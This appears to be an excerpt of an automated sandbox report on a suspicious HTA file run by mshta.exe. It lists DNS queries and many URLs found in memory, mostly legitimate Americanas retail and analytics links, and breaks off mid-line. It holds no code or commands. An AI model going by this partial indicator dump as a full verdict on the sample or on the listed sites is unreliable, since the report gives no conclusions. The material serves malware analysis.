Source: global trafficDNS traffic detected: DNS query: s3-sa-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: 102.57.205.92.host.secureserver.net
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774359125.000000000A8FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: http://amedigital.com/
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: http://www.americanas.com.br/cartao-americanas
Source: mshta.exe, 00000000.00000002.2776588517.000000000C110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.americanas.com.br/cartao_id
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://americanasadvertising.com/?utm_source=site_marcas_americanas&amp;utm_medium=banner&amp;utm_c
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775794335.000000000C086000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717572627.0000000009A5E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667250908.000000000C085000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670092360.000000000C0AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://americanasadvertising.com/?utm_source=site_marcas_americanas&utm_medium=banner&utm_campaign=
Source: mshta.exe, 00000000.00000003.2630244724.0000000006849000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2136389108.0000000006500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2630309881.000000000684B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725661826.000000000684C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2630277819.000000000684A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2630023495.0000000006846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canaldedenuncias.com.br/universoamericanas/
Source: mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745817185.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747706873.000000000C29F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canaldedenuncias.com.br/universoamericanas/8
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666932319.000000000C368000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748344346.000000000C0D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667502431.000000000C106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carreiras.americanas.com/
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cliente.americanas.com.br/minha
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://cliente.americanas.com.br/minha-conta
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776109405.000000000C0C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668705608.000000000C0C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://cliente.americanas.com.br/minha-conta/pedidos
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713852346.000000000960B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresas
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresasjsB
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndes
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667189470.000000000C11D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_tt_0_0_empresas
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770182904.0000000009286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750804406.0000000009285000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=menuacom_aemp_hmem
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoes
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoes2
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/receba-ou-retire-hoje?chave=menuacom_aemp_recebaem3h
Source: mshta.exe, 00000000.00000003.2743405229.000000000C28F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728237084.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777055490.000000000C295000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657107749.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769084191.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747772805.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766148440.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 